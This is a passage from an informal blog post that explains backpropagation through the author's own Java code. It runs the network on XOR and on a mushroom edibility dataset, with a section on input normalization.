Anyways, it turns out that something called the “chain rule” lets us figure out the rate of change of the error at each output node with respect to each incoming weight value. And once we know that, we can use gradient descent to adjust those weights just like we did with the red dot. And it also enables us to iteratively distribute errors through the lower layers, repeating the process. I would just embarrass myself trying to explain all the math that gets us there, but I grasped it just long enough to implement it here.

Again trying to wrap all this up, in short we train a network by (a) computing how poorly it performs on known input/output combinations, (b) divvying up that error between the synapses leading to the outputs and using that to update weight values, then (c) iteratively pushing the error to the next lower layer in the network and repeating the process until we get to the bottom. Do this enough times and we end up with a network that (usually) does a good job of classification, even on inputs it hasn’t seen before.

Show Me the Money (Code)

Matrix math bugs me. OK, mostly I’m jealous of the way other folks toss around “transposes” and “dot products” and seemingly know what they’re talking about without sketching out rows and columns on scrap paper. I suspect I’m not alone. But it turns out that having a solid Matrix class really simplifies the code required for working with fake neurons. So that’s where we’ll start, in Matrix.java. There is absolutely nothing exciting in this file — it just defines a Matrix as a 2D array of doubles and provides a bunch of super-mechanical operations and converters. I like the vibe of the iterate and transform methods, and it’s helpful to understand how I coded up equality tests, but really let’s move on.

Network.java is where all the magic really happens. Network.Config defines parameters and can also fully hydrate/dehydrate the state of weights and biases. One thing to be careful of — I put in a little hook to provide custom activation functions, but right now the code ignores that and always uses sigmoid. Beyond all of that housekeeping, there are three bits of code worth a closer look: forwardPass, trainOne and trainAndTest:

There are two versions of the forwardPass method: a public one that just returns an output array, and an internal one that returns activation values for all neurons in the network. That internal one does the real work and looks like this:

	private List<Matrix> forwardPassInternal(double[] input) {

		List<Matrix> results = new ArrayList<Matrix>();
		results.add(new Matrix(input, 0, cfg.Layers[0]));

		for (int i = 0; i < weights.size(); ++i) {

			Matrix layer = weights.get(i).multiply(results.get(i));
			layer.add(biases.get(i));
			layer.transform(v -> activation.function(v));

			results.add(layer);
		}

		return(results);
	}

The “results” list has one entry for each layer in the network, starting with input and ending with output. Each entry is a Matrix, but keep in mind that it’s really just a simple array of activation values for each neuron at that layer (rows = # of neurons, columns = 1). We initialize the list by copying over the input activation values, then iterate over each layer computing its activation values until we get to the output. This is just an actual implementation of the forward propogation pseudocode we discussed earlier.

Training is also just a few lines of code, but it is a bit harder on the brain:

	public void trainOne(double[] vals) {

		// forwardprop

		List<Matrix> results = forwardPassInternal(vals);

		// backprop
		
		Matrix errors = new Matrix(vals, numInputs(), numInputs() + numOutputs());
		errors.subtract(results.get(results.size() - 1));

		for (int i = weights.size() - 1; i >= 0; --i) {

			// figure out the gradient for each weight in the layer
			Matrix gradient = new Matrix(results.get(i+1));
			gradient.transform(v -> activation.derivative(v));
			gradient.scale(errors);
			gradient.scale(cfg.LearningRate);

			// do this before updating weights
			errors = weights.get(i).transpose().multiply(errors);

			// the actual learning part!
			Matrix weightDeltas = gradient.multiply(results.get(i).transpose());
			weights.get(i).add(weightDeltas);
			biases.get(i).add(gradient);
		}
	}

The input to this function is a single array that holds both input and expected output values. Having both in one array is kind of crappy from an interface design point of view, but you’ll see later that it makes some other code a lot easier to manage. Just hold in your head that the inputs start at index 0, and the expected outputs start at index numInputs().

In brief, we take the output from forwardPassInternal and compute errors at the output layer. We then iterate backwards over each set of synapses / weights, computing the rate of change of each error with respect to its incoming weight, scaling that by our learning rate and the incoming activation, and finally adjusting the weights and bias. All of this crap is where the Matrix operations actually help us stay sane — but remember underneath each of them is just a bunch of nested array traversals.

If you’re still with me, the last important bit is really just scaffolding to help us run it all. I won’t copy all of that code here, but to help you navigate:

  1. Input is provided to the method with a TrainAndTestConfig object that defines key parameters and points at the training data file. The data file must be in TSV (tab-separated value text) format, with one row per test case. The columns should be inputs followed by expected outputs — all double values. Note you can provide additional columns to the right that will be passed through to output — these are meaningless to the algorithms but can be a useful tracking tool as we’ll see in the Normalization section later.
  2. The HoldBackPercentage specifies how much of the training set should be excluded from training and used to test performance. If this value is “0”, we train and test with the full set. This is useful for simple cases, but is typically considered bad practice because we’re trying to build a generalized model, not just one that can spit back cases its seen before. The train and test sets are selected randomly.
  3. Once we get the train and test sets figured out, starting at line 412 we finally instantiate a network and train for the number of iterations specified in the configuration file. The code tries to cover all of the training cases while keeping the order of presentation random; probably could be better here but it does the job.
  4. Then at line 428 we run each row from the testSet and produce an array that contains the inputs, outputs, expected outputs, computed errors and (if provided) extra fields. That array gets written to standard output as a new TSV. If cfg.FinalNetworkStatePath is non-null, we dehydrate the network to yet another file, and we’re done.

Let’s Run It Already

You can pretty easily build and run this code yourself. You’ll need git, maven and a JDK installation, then just run:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox && mvn clean package install
cd ../evolve && mvn clean package
cd datasets
./trainAndTest.sh xor

Here’s some slightly-abridged output from doing just that:

“XOR” is the classic “hello-world” case for backpropagation. It’s a non-linear function that takes two binary inputs and outputs “1” when exactly one input is 1, otherwise “0” (represented by in0, in1, and exp0 in the left highlighted section above). The test files xor-config.json and xor-data.tsv in the datasets directory configure an XOR test that uses a network with one hidden layer of eight neurons, trains over 100,000 iterations and tests with the full data set.

Our little network did pretty good work! The “out0” column shows final predictions from the network, which are very very close to the ideal 0 and 1 values. The right-side highlight gives a good sense of how the network learned over time. It shows the average error at intervals during training: our initial random weights were basically a coin flip (.497), with rapid improvement that flattens out towards the end.

I mentioned earlier that setting “hyperparameters” in these models is as much an art as a science. It’s fun to play with the variables — try changing the learning rate, the number of hidden layers and how many neurons are in each of them, and so on. I’ve found I can burn a lot of hours twiddling this stuff to see what happens.

Normalization

So XOR is cute, but not super-impressive — let’s look at something more interesting. Way back in 1987 Jeff Schlimmer extracted observable data on a bunch of poisonous and edible mushrooms from the Audobon Society Field Guide. More recently in 2020, some folks refreshed and expanded this dataset and have made the new version available under a Creative Commons license — 61,069 training samples, woo hoo! Many thanks to Wagner, Heider, Hattab and all of the other folks that do the often-underappreciated job of assembling data. Everybody loves sexy algorithms, but they’re useless without real-world inputs to test them on.

OK, go big or go home — let’s see if our network can tell us if mushrooms are poisonous. Before we can do that, though, we need to think about normalization.  

The mushroom data set has twenty input columns — some are measurements like “cap-diameter,” others are labels like “gill-spacing” (“c” = close; “w” = crowded; “d” = distant). But our Network model requires that all inputs are floating-point values. Before we can train on the mushroom set, we’ll have to somehow convert each input variable into a double.

The measurements are already doubles, so you might think we can just pass them through. And we can, but there’s a problem. An example — the maximum cap-diameter in the data set is about 62cm, while the max stem-height is just over half of that at 34cm. If we pass through these values unaltered, we will bias the network to treat cap-diameter as more important to classification than stem-height, simply because we’re just pushing more activation into the machine for one vs the other.

To be fair, even if we are naïve about this, over time the network should learn to mute the effect of “louder” inputs. But it would take a ton of training iterations to get there — much better to start from an even playing field. We do this by normalizing all of the inputs to a consistent range like 0 to 1. This is simple to do — just find the minimum and maximum values for each numeric input, and scale inputs at runtime to fit within those bounds. Not too bad.

But what about the label-based inputs like “gill-spacing?” “Close”, “crowded” and “distant” don’t naturally fit any numeric scale — they’re just descriptions of a feature. One option is to search the input for all unique values in each set, and then evenly distribute between 0 and 1 for each one, e.g.,:

  • Close = c = 0
  • Crowded = w = 0.5
  • Distant = d = 1

The only problem with this approach is that the numbers are assigned in arbitrary order. Remember back to forks and spoons — we’re trying to find lines and curves that segment the input space into categories, which works best when “similar” inputs are close to each other. This makes intuitive sense — a mushroom with a 1cm cap-diameter is more likely to be related to one measuring 1.2cm vs 40cm.

In the gill-spacing case above, the order shown is actually pretty good. But how would you arrange a “cap-surface” value of fibrous, grooved, scaly or smooth? Sometimes we just have to do the best we can and hope it all works out. And surprisingly, with neural networks it usually does.

Of course, in most real-world data sets you also have to decide how to deal with missing or malformed data in your set. But we’ve covered a ton of ground already; let’s leave that for another day.

Normalize.java has our implementation of all of this as used for the mushroom dataset. It tries to auto-detect column types, assigns values, and outputs the normalized data to a new file. It can also provide a data dictionary to aid in reverse engineering of network performance.

So are we mushroom experts now?

I ran trainAndTest.sh with the normalized data and a network configured for two hidden layers of forty neurons and a 5% holdback — the results after 2M training iterations are pretty amazing! The graph shows average error by iteration along the way — just as with XOR we start with a coinflip and finish far better; our average error is just 0.009. If we bucket our outputs using .5 as the threshold, we’d be incorrect in only 8 out of 3,054 samples in the test set — a 99.7% success rate — not too shabby.

Of the eight we missed, the good news I suppose is that we failed “the right way” — we called edible mushrooms poisonous rather than vice versa. Unfortunately this wasn’t always true in other runs — I saw cases where the network blew it both ways. So do you eat the mushroom using a classifier that is 99.7% accurate? It turns out that in this case you don’t have to face that hard question — the authors got to 100% success using a more complex learning model called a “random forest” — but risk and philosophical grey areas always lurk around the edges of this stuff, just like with human experts.

Whew — a lot there! But you know, we’re only caught up to about 1990 in the world of artificial intelligence. The last few years especially have seen an explosion in new ideas and improved performance. I am perfectly confident reaching into the back seat to grab a soda while my Tesla does the driving for me — at 75mph on a crowded highway. Seriously, can you believe we live in a world where that happens? I can’t wait to see what comes next.